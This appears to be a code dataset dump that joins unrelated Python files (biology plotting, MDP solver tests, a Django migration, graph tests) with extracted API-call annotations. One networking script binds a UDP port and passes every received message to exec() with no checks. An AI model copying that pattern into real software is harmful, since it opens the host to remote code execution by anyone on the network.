'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7989, 7998), False, 'from vercereg.utils import get_base_rest_uri\n'), ((8259, 8285), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (8276, 8285), False, 'from vercereg.utils import get_base_rest_uri\n'), ((8548, 8574), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (8565, 8574), False, 'from vercereg.utils import get_base_rest_uri\n'), ((1563, 1589), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (1580, 1589), False, 'from vercereg.utils import get_base_rest_uri\n')] |
import pdb # for debuggin
import sys
import time
import pprint
import fcntl # for get_ip_address
import struct # for get_ip_address
import threading # for threading UDPServer
import socket # for UDPServer
#sys.path.append("./third_party/libs/") # for scapy
#import StringIO # for dummy_exec
#import logging # for logging, scapy modify logging level
#logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
#from scapy.all import *
import anhost # linux networking files
def set_env():
return
def dummy_exec(code):
# create file-like string to capture output
codeOut = StringIO.StringIO()
codeErr = StringIO.StringIO()
# capture output and errors
sys.stdout = codeOut
sys.stderr = codeErr
try:
exec(code)
except:
sys.stdout = "error"
sys.stderr = "error"
# restore stdout and stderr
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
#For now throw away the errors
return str(codeOut.getvalue())
def handle_pkt(eth):
eth_src = ':'.join(hex(x) for x in map(ord, eth.src))
eth_dst = ':'.join(hex(x) for x in map(ord, eth.dst))
if eth.type != dpkt.ethernet.ETH_TYPE_IP:
#print "Ethernet pkt"
return
ip = eth.data
if ip.p == dpkt.ip.IP_PROTO_UDP:
ip_src = '.'.join(str(x) for x in map(ord, ip.src))
ip_dst = '.'.join(str(x) for x in map(ord, ip.dst))
udp = ip.data
udp_src = udp.sport
udp_dst = udp.dport
udp_data = dummy_exec(str(udp.data))
print(ip_src, ip_dst)
send(IP(dst=ip_dst,src=ip_src)/UDP(sport=udp_src,dport=udp_dst)/udp_data,\
iface="eth1", verbose=True)
else:
return
print(anhost.get_int_ip())
HOST, PORT = str(anhost.get_int_ip()), 50000
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((HOST,PORT))
while True:
msg, addr = sock.recvfrom(1024)
print("msg:", msg)
server_thread = threading.Thread(target=dummy_exec,args=(msg,))
server_thread.start()
print(server_thread.join())
| [
"threading.Thread",
"socket.socket",
"anhost.get_int_ip"
] | [((1695, 1743), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (1708, 1743), False, 'import socket\n'), ((1622, 1641), 'anhost.get_int_ip', 'anhost.get_int_ip', ([], {}), '()\n', (1639, 1641), False, 'import anhost\n'), ((1853, 1901), 'threading.Thread', 'threading.Thread', ([], {'target': 'dummy_exec', 'args': '(msg,)'}), '(target=dummy_exec, args=(msg,))\n', (1869, 1901), False, 'import threading\n'), ((1660, 1679), 'anhost.get_int_ip', 'anhost.get_int_ip', ([], {}), '()\n', (1677, 1679), False, 'import anhost\n')] |
#%%
import os
import pickle
import cloudpickle
import itertools
import glob
import numpy as np
import scipy as sp
import pandas as pd
import git
# Import matplotlib stuff for plotting
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
# Seaborn, useful for graphics
import seaborn as sns
# Import the project utils
import ccutils
# Set PBoC plotting format
ccutils.viz.set_plotting_style()
# Increase dpi
#%%
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Define directories for data and figure
figdir = f'{homedir}/fig/si/'
datadir = f'{homedir}/data/mRNA_FISH/'
mcmcdir = f'{homedir}/data/mcmc/'
# %%
# Read the data
df = pd.read_csv(f'{datadir}Jones_Brewster_2014.csv', index_col=0)
# Extract the lacUV5 data
dfUV5 = df[df.experiment == 'UV5']
# Load the flat-chain
with open(f'{mcmcdir}lacUV5_constitutive_mRNA_prior.pkl', 'rb') as file:
unpickler = pickle.Unpickler(file)
gauss_flatchain = unpickler.load()
gauss_flatlnprobability = unpickler.load()
# Generate a Pandas Data Frame with the mcmc chain
index = ['kp_on', 'kp_off', 'rm']
# Generate a data frame out of the MCMC chains
df_mcmc = pd.DataFrame(gauss_flatchain, columns=index)
# rerbsine the index with the new entries
index = df_mcmc.columns
# map value of the parameters
max_idx = np.argmax(gauss_flatlnprobability, axis=0)
kp_on, kp_off, rm = df_mcmc.iloc[max_idx, :]
# Define bins
bins = np.arange(0, dfUV5.mRNA_cell.max())
logp_mRNA = ccutils.model.log_p_m_unreg(bins, kp_on, kp_off, 1, rm)
# Plot the histogram of the data with bins of width 1
_ = plt.hist(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',
alpha=1, label='sm-FISH data', align='left', lw=0)
plt.step(bins, np.exp(logp_mRNA), color='r', ls='-', lw=1.5,
label='two-state promoter fit')
# Label the plot
plt.xlabel('mRNA / cell')
plt.ylabel('probability')
plt.legend()
plt.tight_layout()
plt.savefig(f'{figdir}/figS03.pdf', bbox_inches='tight')
| [
"pandas.DataFrame",
"matplotlib.pyplot.hist",
"numpy.argmax",
"pandas.read_csv",
"matplotlib.pyplot.legend",
"git.Repo",
"ccutils.model.log_p_m_unreg",
"ccutils.viz.set_plotting_style",
"numpy.exp",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.tight_layout",
"pickle.Unpickler",
"matplotlib.pyplot.savefig"
] | [((394, 426), 'ccutils.viz.set_plotting_style', 'ccutils.viz.set_plotting_style', ([], {}), '()\n', (424, 426), False, 'import ccutils\n'), ((486, 532), 'git.Repo', 'git.Repo', (['"""./"""'], {'search_parent_directories': '(True)'}), "('./', search_parent_directories=True)\n", (494, 532), False, 'import git\n'), ((733, 794), 'pandas.read_csv', 'pd.read_csv', (['f"""{datadir}Jones_Brewster_2014.csv"""'], {'index_col': '(0)'}), "(f'{datadir}Jones_Brewster_2014.csv', index_col=0)\n", (744, 794), True, 'import pandas as pd\n'), ((1226, 1270), 'pandas.DataFrame', 'pd.DataFrame', (['gauss_flatchain'], {'columns': 'index'}), '(gauss_flatchain, columns=index)\n', (1238, 1270), True, 'import pandas as pd\n'), ((1379, 1421), 'numpy.argmax', 'np.argmax', (['gauss_flatlnprobability'], {'axis': '(0)'}), '(gauss_flatlnprobability, axis=0)\n', (1388, 1421), True, 'import numpy as np\n'), ((1538, 1593), 'ccutils.model.log_p_m_unreg', 'ccutils.model.log_p_m_unreg', (['bins', 'kp_on', 'kp_off', '(1)', 'rm'], {}), '(bins, kp_on, kp_off, 1, rm)\n', (1565, 1593), False, 'import ccutils\n'), ((1653, 1778), 'matplotlib.pyplot.hist', 'plt.hist', (['dfUV5.mRNA_cell'], {'bins': 'bins', 'density': '(1)', 'histtype': '"""stepfilled"""', 'alpha': '(1)', 'label': '"""sm-FISH data"""', 'align': '"""left"""', 'lw': '(0)'}), "(dfUV5.mRNA_cell, bins=bins, density=1, histtype='stepfilled',\n alpha=1, label='sm-FISH data', align='left', lw=0)\n", (1661, 1778), True, 'import matplotlib.pyplot as plt\n'), ((1909, 1934), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""mRNA / cell"""'], {}), "('mRNA / cell')\n", (1919, 1934), True, 'import matplotlib.pyplot as plt\n'), ((1935, 1960), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""probability"""'], {}), "('probability')\n", (1945, 1960), True, 'import matplotlib.pyplot as plt\n'), ((1961, 1973), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1971, 1973), True, 'import matplotlib.pyplot as plt\n'), ((1974, 1992), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1990, 1992), True, 'import matplotlib.pyplot as plt\n'), ((1993, 2049), 'matplotlib.pyplot.savefig', 'plt.savefig', (['f"""{figdir}/figS03.pdf"""'], {'bbox_inches': '"""tight"""'}), "(f'{figdir}/figS03.pdf', bbox_inches='tight')\n", (2004, 2049), True, 'import matplotlib.pyplot as plt\n'), ((969, 991), 'pickle.Unpickler', 'pickle.Unpickler', (['file'], {}), '(file)\n', (985, 991), False, 'import pickle\n'), ((1804, 1821), 'numpy.exp', 'np.exp', (['logp_mRNA'], {}), '(logp_mRNA)\n', (1810, 1821), True, 'import numpy as np\n')] |
import pickle
import time
from datetime import datetime
def checkpoint(shared_model, shared_dataset, args):
try:
while True:
# Save dataset
file = open(args.data, 'wb')
pickle.dump(list(shared_dataset), file)
file.close()
# Save model
now = datetime.now().strftime("%d_%m_%H_%M")
shared_model.save('models/checkpoint_{}.model'.format(now))
time.sleep(10 * 60)
except KeyboardInterrupt:
print('exiting checkpoint')
| [
"datetime.datetime.now",
"time.sleep"
] | [((452, 471), 'time.sleep', 'time.sleep', (['(10 * 60)'], {}), '(10 * 60)\n', (462, 471), False, 'import time\n'), ((328, 342), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (340, 342), False, 'from datetime import datetime\n')] |
import unittest
import numpy as np
from frozendict import frozendict
from msdm.core.distributions import DictDistribution
from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP
from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid
from msdm.domains import GridWorld
class MyTestCase(unittest.TestCase):
def test_policy_iteration(self):
mdp = Counter(3)
res = PolicyIteration().plan_on(mdp)
out = res.policy.run_on(mdp)
assert out.state_traj == (0, 1, 2)
assert out.action_traj == (1, 1, 1)
assert res.policy.action(0) == 1
assert res.policy.action(1) == 1
assert res.policy.action(2) == 1
def test_policy_iteration_geometric(self):
mdp = Geometric(p=1/13)
res = PolicyIteration(iterations=500).plan_on(mdp)
assert np.isclose(res.V[0], -13), res.V
def test_policy_iteration_varying_action_number(self):
mdp = VaryingActionNumber()
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[0], -2), res.V
assert res.policy.run_on(mdp).action_traj == (+1, +1)
def test_equal_value(self):
'''
In this MDP, the value at the non-initial, non-terminal corners is equal.
This means the policy at the start state should assign equal probability
to either.
'''
mdp = GridWorld(
tile_array=[
'.g',
's.',
],
feature_rewards={'g': 0},
step_cost=-1,
)
res = PolicyIteration().plan_on(mdp)
assert np.isclose(res.V[frozendict(x=0, y=1)], res.V[frozendict(x=1, y=0)])
assert res.policy.action_dist(frozendict(x=0, y=0)).\
isclose(DictDistribution({
frozendict({'dx': 0, 'dy': 0}): 0,
frozendict({'dx': 1, 'dy': 0}): 1/2,
frozendict({'dx': -1, 'dy': 0}): 0,
frozendict({'dy': 1, 'dx': 0}): 1/2,
frozendict({'dy': -1, 'dx': 0}): 0
}))
assert res.policy.action_dist(frozendict(x=0, y=1)).isclose(DictDistribution({
frozendict({'dx': 1, 'dy': 0}): 1,
}))
def test_policy_iteration_gridworld(self):
gw = GridWorld(
tile_array=[
'......g',
'...####',
'..##...',
'..#....',
'.......',
'####...',
's......',
])
pi_res = PolicyIteration()(gw)
vi_res = ValueIteration()(gw)
lrtdp = LRTDP()(gw)
assert pi_res.initial_value == vi_res.initial_value == lrtdp.initial_value
def test_policy_iteration_gridworld2(self):
gw = GridWorld((
'..g..',
'.###.',
'..#..',
'..s..'
), discount_rate=1 - 1e-5)
pi = PolicyIteration().plan_on(gw)
vi = ValueIteration().plan_on(gw)
reachable = sorted(gw.reachable_states(),
key=lambda s: (s['x'], s['y']))
pi_mat = pi.policy.as_matrix(reachable, gw.action_list)
vi_mat = vi.policy.as_matrix(reachable, gw.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
def test_policy_iteration_and_value_iteration_russell_norvig(self):
for discount_rate in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
for slip_prob in [i/10 for i in range(1, 10)] + [.95, .99, 1.0]:
gw = make_russell_norvig_grid(
discount_rate=discount_rate,
slip_prob=slip_prob,
)
vi_res = ValueIteration(iterations=int(1e3)).plan_on(gw)
pi_res = PolicyIteration(iterations=int(1e3)).plan_on(gw)
assert np.isclose(vi_res._qvaluemat, pi_res._qvaluemat, atol=5e-4).all()
def test_policy_iteration_heavenorhell(self):
# technically a pomdp, but we can solve underlying mdp
from msdm.domains.heavenorhell import HeavenOrHell
for discount_rate in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
for coherence in [i/10 for i in range(1, 10, 2)] + [.95, .99, .99999]:
print(discount_rate, coherence)
hh = HeavenOrHell(
coherence=coherence,
grid=
"""
hcg
#.#
#s#
""",
discount_rate=discount_rate,
heaven_reward=50,
hell_reward=-50,
)
pi = PolicyIteration().plan_on(hh)
vi = ValueIteration().plan_on(hh)
reachable = sorted(hh.reachable_states())
pi_mat = pi.policy.as_matrix(reachable, hh.action_list)
vi_mat = vi.policy.as_matrix(reachable, hh.action_list)
assert (pi_mat == vi_mat).all()
assert all([np.isclose(pi.valuefunc[s], vi.valuefunc[s])
for s in reachable])
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"msdm.algorithms.PolicyIteration",
"msdm.tests.domains.Counter",
"msdm.tests.domains.Geometric",
"msdm.algorithms.ValueIteration",
"msdm.tests.domains.make_russell_norvig_grid",
"msdm.algorithms.LRTDP",
"numpy.isclose",
"msdm.domains.GridWorld",
"msdm.domains.heavenorhell.HeavenOrHell",
"msdm.tests.domains.VaryingActionNumber",
"frozendict.frozendict"
] | [((5289, 5304), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5302, 5304), False, 'import unittest\n'), ((422, 432), 'msdm.tests.domains.Counter', 'Counter', (['(3)'], {}), '(3)\n', (429, 432), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((787, 806), 'msdm.tests.domains.Geometric', 'Geometric', ([], {'p': '(1 / 13)'}), '(p=1 / 13)\n', (796, 806), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((879, 904), 'numpy.isclose', 'np.isclose', (['res.V[0]', '(-13)'], {}), '(res.V[0], -13)\n', (889, 904), True, 'import numpy as np\n'), ((986, 1007), 'msdm.tests.domains.VaryingActionNumber', 'VaryingActionNumber', ([], {}), '()\n', (1005, 1007), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((1068, 1092), 'numpy.isclose', 'np.isclose', (['res.V[0]', '(-2)'], {}), '(res.V[0], -2)\n', (1078, 1092), True, 'import numpy as np\n'), ((1415, 1489), 'msdm.domains.GridWorld', 'GridWorld', ([], {'tile_array': "['.g', 's.']", 'feature_rewards': "{'g': 0}", 'step_cost': '(-1)'}), "(tile_array=['.g', 's.'], feature_rewards={'g': 0}, step_cost=-1)\n", (1424, 1489), False, 'from msdm.domains import GridWorld\n'), ((2297, 2400), 'msdm.domains.GridWorld', 'GridWorld', ([], {'tile_array': "['......g', '...####', '..##...', '..#....', '.......', '####...', 's......']"}), "(tile_array=['......g', '...####', '..##...', '..#....', '.......',\n '####...', 's......'])\n", (2306, 2400), False, 'from msdm.domains import GridWorld\n'), ((2787, 2859), 'msdm.domains.GridWorld', 'GridWorld', (["('..g..', '.###.', '..#..', '..s..')"], {'discount_rate': '(1 - 1e-05)'}), "(('..g..', '.###.', '..#..', '..s..'), discount_rate=1 - 1e-05)\n", (2796, 2859), False, 'from msdm.domains import GridWorld\n'), ((2554, 2571), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (2569, 2571), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2593, 2609), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (2607, 2609), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2630, 2637), 'msdm.algorithms.LRTDP', 'LRTDP', ([], {}), '()\n', (2635, 2637), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((447, 464), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (462, 464), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((819, 850), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {'iterations': '(500)'}), '(iterations=500)\n', (834, 850), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1022, 1039), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (1037, 1039), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1598, 1615), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (1613, 1615), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((1661, 1681), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(1)'}), '(x=0, y=1)\n', (1671, 1681), False, 'from frozendict import frozendict\n'), ((1690, 1710), 'frozendict.frozendict', 'frozendict', ([], {'x': '(1)', 'y': '(0)'}), '(x=1, y=0)\n', (1700, 1710), False, 'from frozendict import frozendict\n'), ((2930, 2947), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (2945, 2947), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((2973, 2989), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (2987, 2989), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((3299, 3343), 'numpy.isclose', 'np.isclose', (['pi.valuefunc[s]', 'vi.valuefunc[s]'], {}), '(pi.valuefunc[s], vi.valuefunc[s])\n', (3309, 3343), True, 'import numpy as np\n'), ((3633, 3707), 'msdm.tests.domains.make_russell_norvig_grid', 'make_russell_norvig_grid', ([], {'discount_rate': 'discount_rate', 'slip_prob': 'slip_prob'}), '(discount_rate=discount_rate, slip_prob=slip_prob)\n', (3657, 3707), False, 'from msdm.tests.domains import Counter, GNTFig6_6, Geometric, VaryingActionNumber, make_russell_norvig_grid\n'), ((4420, 4649), 'msdm.domains.heavenorhell.HeavenOrHell', 'HeavenOrHell', ([], {'coherence': 'coherence', 'grid': '"""\n hcg\n #.#\n #s#\n """', 'discount_rate': 'discount_rate', 'heaven_reward': '(50)', 'hell_reward': '(-50)'}), '(coherence=coherence, grid=\n """\n hcg\n #.#\n #s#\n """\n , discount_rate=discount_rate, heaven_reward=50, hell_reward=-50)\n', (4432, 4649), False, 'from msdm.domains.heavenorhell import HeavenOrHell\n'), ((1751, 1771), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(0)'}), '(x=0, y=0)\n', (1761, 1771), False, 'from frozendict import frozendict\n'), ((1830, 1860), 'frozendict.frozendict', 'frozendict', (["{'dx': 0, 'dy': 0}"], {}), "({'dx': 0, 'dy': 0})\n", (1840, 1860), False, 'from frozendict import frozendict\n'), ((1881, 1911), 'frozendict.frozendict', 'frozendict', (["{'dx': 1, 'dy': 0}"], {}), "({'dx': 1, 'dy': 0})\n", (1891, 1911), False, 'from frozendict import frozendict\n'), ((1934, 1965), 'frozendict.frozendict', 'frozendict', (["{'dx': -1, 'dy': 0}"], {}), "({'dx': -1, 'dy': 0})\n", (1944, 1965), False, 'from frozendict import frozendict\n'), ((1986, 2016), 'frozendict.frozendict', 'frozendict', (["{'dy': 1, 'dx': 0}"], {}), "({'dy': 1, 'dx': 0})\n", (1996, 2016), False, 'from frozendict import frozendict\n'), ((2039, 2070), 'frozendict.frozendict', 'frozendict', (["{'dy': -1, 'dx': 0}"], {}), "({'dy': -1, 'dx': 0})\n", (2049, 2070), False, 'from frozendict import frozendict\n'), ((2124, 2144), 'frozendict.frozendict', 'frozendict', ([], {'x': '(0)', 'y': '(1)'}), '(x=0, y=1)\n', (2134, 2144), False, 'from frozendict import frozendict\n'), ((2189, 2219), 'frozendict.frozendict', 'frozendict', (["{'dx': 1, 'dy': 0}"], {}), "({'dx': 1, 'dy': 0})\n", (2199, 2219), False, 'from frozendict import frozendict\n'), ((3945, 4006), 'numpy.isclose', 'np.isclose', (['vi_res._qvaluemat', 'pi_res._qvaluemat'], {'atol': '(0.0005)'}), '(vi_res._qvaluemat, pi_res._qvaluemat, atol=0.0005)\n', (3955, 4006), True, 'import numpy as np\n'), ((4805, 4822), 'msdm.algorithms.PolicyIteration', 'PolicyIteration', ([], {}), '()\n', (4820, 4822), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((4856, 4872), 'msdm.algorithms.ValueIteration', 'ValueIteration', ([], {}), '()\n', (4870, 4872), False, 'from msdm.algorithms import ValueIteration, PolicyIteration, LRTDP\n'), ((5163, 5207), 'numpy.isclose', 'np.isclose', (['pi.valuefunc[s]', 'vi.valuefunc[s]'], {}), '(pi.valuefunc[s], vi.valuefunc[s])\n', (5173, 5207), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test some edge cases.
"""
import unittest
from socialgraph import autommittee
class TestPowerHistory(unittest.TestCase):
def setUp(self):
self.G = autommittee.Graph()
self.G.add_edge('b', 'a')
self.G.add_edge('a', 'c')
self.G.add_edge('d', 'c')
self.G.add_edge('e', 'c')
self.G.add_edge('c', 'a')
def tearDown(self):
del self.G
def test_calc_power(self):
self.assertEqual([('a', 1), ('b', 2), ('c', 5)], self.G._nodes['a'].full_power())
self.assertEqual([('c', 1), ('a', 3), ('d', 4), ('e', 5)], self.G._nodes['c'].full_power()) | [
"socialgraph.autommittee.Graph"
] | [((214, 233), 'socialgraph.autommittee.Graph', 'autommittee.Graph', ([], {}), '()\n', (231, 233), False, 'from socialgraph import autommittee\n')] |
# Generated by Django 3.2.5 on 2021-07-20 13:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='chatmessage',
name='user_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='sender'),
),
]
| [
"django.db.models.ForeignKey",
"django.db.migrations.swappable_dependency"
] | [((227, 284), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (258, 284), False, 'from django.db import migrations, models\n'), ((461, 590), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""sender"""'}), "(null=True, on_delete=django.db.models.deletion.CASCADE,\n to=settings.AUTH_USER_MODEL, verbose_name='sender')\n", (478, 590), False, 'from django.db import migrations, models\n')] |
# Copyright 2018 <NAME>, <NAME>, <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Draw plots"""
import os
import math
import numpy as np
import pandas as pd
# forbid GUI
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
# /**
# * Multi Plots Container
# */
class EqualGridFigure(object):
"""Distribute all axes with similar attributes with grids of same size
It can have multi axes in one figure, but all axes will have the same height and width,
so they should describe data of similar attribute.
"""
def __init__(self, num_rows, num_cols, ax_height, ax_width, title=None, font_size=None):
super(EqualGridFigure, self).__init__()
# global settings
if not font_size is None: mpl.rcParams.update({'font.size': font_size})
# figure size
self.num_rows = num_rows
self.num_cols = num_cols
self.fig, self.axes = plt.subplots(
num_rows, num_cols,
figsize=(ax_width * num_cols, max(ax_height * num_rows, 20)))
# figure title
if not title is None:
if font_size is None: self.fig.suptitle(title)
else: self.fig.suptitle(title, fontsize=font_size * 2)
# buffer for each plot
self.cnt = [[0 for cl in range(self.num_cols)] for rw in range(self.num_rows)]
def __getitem__(self, idx_pair):
assert len(idx_pair) == 2
row_id, col_id = idx_pair
if self.num_rows == 1:
if self.num_cols == 1: return self.axes
else: return self.axes[col_id]
else:
if self.num_cols == 1: return self.axes[row_id]
else: return self.axes[row_id][col_id]
def close(self):
plt.close(self.fig)
def subtitle(self, row_id, col_id, subtitle,
x_label=None, y_label=None):
"""Set ax title
Args
----
row_id, col_id : int
indices to specify the exact ax
subtitle : str
title for specified ax
x_label : str
title for x-axis
y_label : str
title for y-axis
"""
ax = self[row_id, col_id]
ax.set_title(subtitle)
if x_label is not None: ax.set_xlabel(x_label)
if y_label is not None: ax.set_ylabel(y_label)
def save_fig(self, path, close=True):
"""Save figure of all axes
Args
----
path : str
path to save the figure
close : bool
if close figure after saving
"""
dirname = os.path.dirname(path)
_, extname = os.path.splitext(path)
extname = extname[1:]
if not os.path.isdir(dirname): os.makedirs(dirname)
self.fig.savefig(path, format=extname, dpi='figure')
if close: self.close()
def lineplot(self, row_id, col_id, x_data, y_data,
label=None, color=None, alpha=None, marker=None, linestyle=None,
vmin=None, vmax=None):
"""Line plot
Args
----
row_id, col_id : int
indices to specify the exact ax
x_data, y_data : <1D-array-like>
data for x-axis and y-axis
label : str
label of data
color : str
specify color to plot
marker : str
point style to plot
linestyle : str
line style to plot
vmin : float
min value of data to plot
vmax : float
max value of data to plot
Draw a line in ax (row_id, col_id).
It can draw a line on ax which already has something.
"""
ax = self[row_id, col_id]
# settings
label = label or 'Line {}'.format(self.cnt[row_id][col_id])
color = color or 'C{}'.format(self.cnt[row_id][col_id])
alpha = alpha or 1
marker = marker or ','
linestyle = linestyle or '-'
ax.plot(x_data, y_data, label=label, \
color=color, alpha=alpha, \
marker=marker, \
linewidth=6.0, linestyle=linestyle)
if vmin: ax.set_ylim(ymin=vmin)
if vmax: ax.set_ylim(ymax=vmax)
self.cnt[row_id][col_id] += 1
def legend(self):
"""Place legend"""
for rw in range(self.num_rows):
for cl in range(self.num_cols):
ax = self[rw, cl]
if self.cnt[rw][cl] > 1: ax.legend()
| [
"os.makedirs",
"os.path.isdir",
"matplotlib.pyplot.close",
"os.path.dirname",
"matplotlib.rcParams.update",
"matplotlib.use",
"os.path.splitext"
] | [((749, 763), 'matplotlib.use', 'mpl.use', (['"""Agg"""'], {}), "('Agg')\n", (756, 763), True, 'import matplotlib as mpl\n'), ((2348, 2367), 'matplotlib.pyplot.close', 'plt.close', (['self.fig'], {}), '(self.fig)\n', (2357, 2367), True, 'import matplotlib.pyplot as plt\n'), ((3223, 3244), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (3238, 3244), False, 'import os\n'), ((3267, 3289), 'os.path.splitext', 'os.path.splitext', (['path'], {}), '(path)\n', (3283, 3289), False, 'import os\n'), ((1345, 1390), 'matplotlib.rcParams.update', 'mpl.rcParams.update', (["{'font.size': font_size}"], {}), "({'font.size': font_size})\n", (1364, 1390), True, 'import matplotlib as mpl\n'), ((3339, 3361), 'os.path.isdir', 'os.path.isdir', (['dirname'], {}), '(dirname)\n', (3352, 3361), False, 'import os\n'), ((3363, 3383), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (3374, 3383), False, 'import os\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.